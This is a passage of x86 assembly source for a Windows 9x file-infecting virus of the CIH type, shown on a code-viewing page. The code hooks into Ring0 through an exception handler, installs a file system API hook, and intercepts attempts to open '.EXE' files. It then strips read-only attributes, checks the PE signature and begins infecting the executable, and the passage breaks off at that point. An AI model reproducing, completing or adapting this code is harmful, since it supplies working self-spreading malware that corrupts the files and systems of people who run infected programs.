📄 3.htm
字号:
pop eax </p>
<p>; ************************************* <br>
; * Return Original App to Execute * <br>
; ************************************* </p>
<p>pop ebp </p>
<p>push 00401000h ; Push Original <br>
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack </p>
<p>ret ; Return to Original App Entry Point </p>
<p>; ********************************************************* <br>
; * Ring0 Virus Game Initial Program * <br>
; ********************************************************* </p>
<p>MyExceptionHook: <br>
@2 = MyExceptionHook </p>
<p>jz InstallMyFileSystemApiHook </p>
<p>; ************************************* <br>
; * Do My Virus Exist in System !? * <br>
; ************************************* </p>
<p>mov ecx, dr0 <br>
jecxz AllocateSystemMemoryPage </p>
<p>add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException </p>
<p>; ************************************* <br>
; * Return to Ring3 Initial Program * <br>
; ************************************* </p>
<p>ExitRing0Init: <br>
mov [ebx-04h], bp ; <br>
shr ebp, 16 ; Restore Exception <br>
mov [ebx+02h], bp ; </p>
<p>iretd </p>
<p>; ************************************* <br>
; * Allocate SystemMemory Page to Use * <br>
; ************************************* </p>
<p>AllocateSystemMemoryPage: </p>
<p>mov dr0, ebx ; Set the Mark of My Virus Exist in System </p>
<p>push 00000000fh ; <br>
push ecx ; <br>
push 0ffffffffh ; <br>
push ecx ; <br>
push ecx ; <br>
push ecx ; <br>
push 000000001h ; <br>
push 000000002h ; <br>
int 20h ; VMMCALL _PageAllocate <br>
_PageAllocate = $ ; <br>
dd 00010053h ; Use EAX, ECX, EDX, and flags <br>
add esp, 08h*04h </p>
<p>xchg edi, eax ; EDI = SystemMemory Start Address </p>
<p>lea eax, MyVirusStart-@2[esi] </p>
<p>iretd ; Return to Ring3 Initial Program </p>
<p>; ************************************* <br>
; * Install My File System Api Hook * <br>
; ************************************* </p>
<p>InstallMyFileSystemApiHook: </p>
<p>lea eax, FileSystemApiHook-@6[edi] </p>
<p>push eax ; <br>
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook <br>
IFSMgr_InstallFileSystemApiHook = $ ; <br>
dd 00400067h ; Use EAX, ECX, EDX, and flags </p>
<p>mov dr0, eax ; Save OldFileSystemApiHook Address </p>
<p>pop eax ; EAX = FileSystemApiHook Address </p>
<p>; Save Old IFSMgr_InstallFileSystemApiHook Entry Point <br>
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] <br>
mov edx, [ecx] <br>
mov OldInstallFileSystemApiHook-@3[eax], edx </p>
<p>; Modify IFSMgr_InstallFileSystemApiHook Entry Point <br>
lea eax, InstallFileSystemApiHook-@3[eax] <br>
mov [ecx], eax </p>
<p>cli </p>
<p>jmp ExitRing0Init </p>
<p>; ********************************************************* <br>
; * Code Size of Merge Virus Code Section * <br>
; ********************************************************* </p>
<p>CodeSizeOfMergeVirusCodeSection = offset $ </p>
<p>; ********************************************************* <br>
; * IFSMgr_InstallFileSystemApiHook * <br>
; ********************************************************* </p>
<p>InstallFileSystemApiHook: <br>
push ebx </p>
<p>call @4 ; <br>
@4: ; <br>
pop ebx ; mov ebx, offset FileSystemApiHook <br>
add ebx, FileSystemApiHook-@4 ; </p>
<p>push ebx <br>
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook <br>
IFSMgr_RemoveFileSystemApiHook = $ <br>
dd 00400068h ; Use EAX, ECX, EDX, and flags <br>
pop eax </p>
<p>; Call Original IFSMgr_InstallFileSystemApiHook <br>
; to Link Client FileSystemApiHook <br>
push dword ptr [esp+8] <br>
call OldInstallFileSystemApiHook-@3[ebx] <br>
pop ecx </p>
<p>push eax </p>
<p>; Call Original IFSMgr_InstallFileSystemApiHook <br>
; to Link My FileSystemApiHook <br>
push ebx <br>
call OldInstallFileSystemApiHook-@3[ebx] <br>
pop ecx </p>
<p>mov dr0, eax ; Adjust OldFileSystemApiHook Address </p>
<p>pop eax </p>
<p>pop ebx </p>
<p>ret </p>
<p>; ********************************************************* <br>
; * Static Data * <br>
; ********************************************************* </p>
<p>OldInstallFileSystemApiHook dd ? </p>
<p>; ********************************************************* <br>
; * IFSMgr_FileSystemHook * <br>
; ********************************************************* </p>
<p>; ************************************* <br>
; * IFSMgr_FileSystemHook Entry Point * <br>
; ************************************* </p>
<p>FileSystemApiHook: <br>
@3 = FileSystemApiHook </p>
<p>pushad </p>
<p>call @5 ; <br>
@5: ; <br>
pop esi ; mov esi, offset VirusGameDataStartAddress <br>
add esi, VirusGameDataStartAddress-@5 </p>
<p>; ************************************* <br>
; * Is OnBusy !? * <br>
; ************************************* </p>
<p>test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) <br>
jnz pIFSFunc ; goto pIFSFunc </p>
<p>; ************************************* <br>
; * Is OpenFile !? * <br>
; ************************************* </p>
<p>; if ( NotOpenFile ) <br>
; goto prevhook <br>
lea ebx, [esp+20h+04h+04h] <br>
cmp dword ptr [ebx], 00000024h <br>
jne prevhook </p>
<p>; ************************************* <br>
; * Enable OnBusy * <br>
; ************************************* </p>
<p>inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy </p>
<p>; ************************************* <br>
; * Get FilePath's DriveNumber, * <br>
; * then Set the DriveName to * <br>
; * FileNameBuffer. * <br>
; ************************************* <br>
; * Ex. If DriveNumber is 03h, * <br>
; * DriveName is 'C:'. * <br>
; ************************************* </p>
<p>; mov esi, offset FileNameBuffer <br>
add esi, FileNameBuffer-@6 </p>
<p>push esi </p>
<p>mov al, [ebx+04h] <br>
cmp al, 0ffh <br>
je CallUniToBCSPath </p>
<p>add al, 40h <br>
mov ah, ':' </p>
<p>mov [esi], eax </p>
<p>inc esi <br>
inc esi </p>
<p>; ************************************* <br>
; * UniToBCSPath * <br>
; ************************************* <br>
; * This Service Converts * <br>
; * a Canonicalized Unicode Pathname * <br>
; * to a Normal Pathname in the * <br>
; * Specified BCS Character Set. * <br>
; ************************************* </p>
<p>CallUniToBCSPath: <br>
push 00000000h <br>
push FileNameBufferSize <br>
mov ebx, [ebx+10h] <br>
mov eax, [ebx+0ch] <br>
add eax, 04h <br>
push eax <br>
push esi <br>
int 20h ; VXDCall UniToBCSPath <br>
UniToBCSPath = $ <br>
dd 00400041h <br>
add esp, 04h*04h </p>
<p>; ************************************* <br>
; * Is FileName '.EXE' !? * <br>
; ************************************* </p>
<p>; cmp [esi+eax-04h], '.EXE' <br>
cmp [esi+eax-04h], 'EXE.' <br>
pop esi <br>
jne DisableOnBusy </p>
<p>IF DEBUG </p>
<p>; ************************************* <br>
; * Only for Debug * <br>
; ************************************* </p>
<p>; cmp [esi+eax-06h], 'FUCK' <br>
cmp [esi+eax-06h], 'KCUF' <br>
jne DisableOnBusy </p>
<p>ENDIF </p>
<p>; ************************************* <br>
; * Is Open Existing File !? * <br>
; ************************************* </p>
<p>; if ( NotOpenExistingFile ) <br>
; goto DisableOnBusy <br>
cmp word ptr [ebx+18h], 01h <br>
jne DisableOnBusy </p>
<p>; ************************************* <br>
; * Get Attributes of the File * <br>
; ************************************* </p>
<p>mov ax, 4300h <br>
int 20h ; VXDCall IFSMgr_Ring0_FileIO <br>
IFSMgr_Ring0_FileIO = $ <br>
dd 00400032h </p>
<p>jc DisableOnBusy </p>
<p>push ecx </p>
<p>; ************************************* <br>
; * Get IFSMgr_Ring0_FileIO Address * <br>
; ************************************* </p>
<p>mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] <br>
mov edi, [edi] </p>
<p>; ************************************* <br>
; * Is Read-Only File !? * <br>
; ************************************* </p>
<p>test cl, 01h <br>
jz OpenFile </p>
<p>; ************************************* <br>
; * Modify Read-Only File to Write * <br>
; ************************************* </p>
<p>mov ax, 4301h <br>
xor ecx, ecx <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Open File * <br>
; ************************************* </p>
<p>OpenFile: <br>
xor eax, eax <br>
mov ah, 0d5h <br>
xor ecx, ecx <br>
xor edx, edx <br>
inc edx <br>
mov ebx, edx <br>
inc ebx <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>xchg ebx, eax ; mov ebx, FileHandle </p>
<p>; ************************************* <br>
; * Need to Restore * <br>
; * Attributes of the File !? * <br>
; ************************************* </p>
<p>pop ecx </p>
<p>pushf </p>
<p>test cl, 01h <br>
jz IsOpenFileOK </p>
<p>; ************************************* <br>
; * Restore Attributes of the File * <br>
; ************************************* </p>
<p>mov ax, 4301h <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; ************************************* <br>
; * Is Open File OK !? * <br>
; ************************************* </p>
<p>IsOpenFileOK: <br>
popf </p>
<p>jc DisableOnBusy </p>
<p>; ************************************* <br>
; * Open File Already Succeed. ^__^ * <br>
; ************************************* </p>
<p>push esi ; Push FileNameBuffer Address to Stack </p>
<p>pushf ; Now CF = 0, Push Flag to Stack </p>
<p>add esi, DataBuffer-@7 ; mov esi, offset DataBuffer </p>
<p>; *************************** <br>
; * Get OffsetToNewHeader * <br>
; *************************** </p>
<p>xor eax, eax <br>
mov ah, 0d6h </p>
<p>; For Doing Minimal VirusCode's Length, <br>
; I Save EAX to EBP. <br>
mov ebp, eax </p>
<p>xor ecx, ecx <br>
mov cl, 04h <br>
xor edx, edx <br>
mov dl, 3ch <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>mov edx, [esi] </p>
<p>; *************************** <br>
; * Get 'PE\0' Signature * <br>
; * of ImageFileHeader, and * <br>
; * Infected Mark. * <br>
; *************************** </p>
<p>dec edx </p>
<p>mov eax, ebp <br>
call edi ; VXDCall IFSMgr_Ring0_FileIO </p>
<p>; *************************** <br>
; * Is PE !? * <br>
; *************************** <br>
; * Is the File * <br>
; * Already Infected !? * <br>
; *************************** </p>
<p>; cmp [esi], '\0PE\0' <br>
cmp dword ptr [esi], 00455000h <br>
jne CloseFile </p>
<p>; ************************************* <br>
; * The File is ^o^ * <br>
; * PE(Portable Executable) indeed. * <br>
; ************************************* <br>
; * The File isn't also Infected. * <br>
; ************************************* </p>
<p>; ************************************* <br>
; * Start to Infect the File * <br>
; ************************************* <br>
; * Registers Use Status Now : * <br>
; * * <br>
; * EAX = 04h * <br>
; * EBX = File Handle * <br>
; * ECX = 04h * <br>
; * EDX = 'PE\0\0' Signature of * <br>
; * ImageFileHeader Pointer's * <br>
; * Former Byte. * <br>
; * ESI = DataBuffer Address ==> @8 * <br>
; * EDI = IFSMgr_Ring0_FileIO Address * <br>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -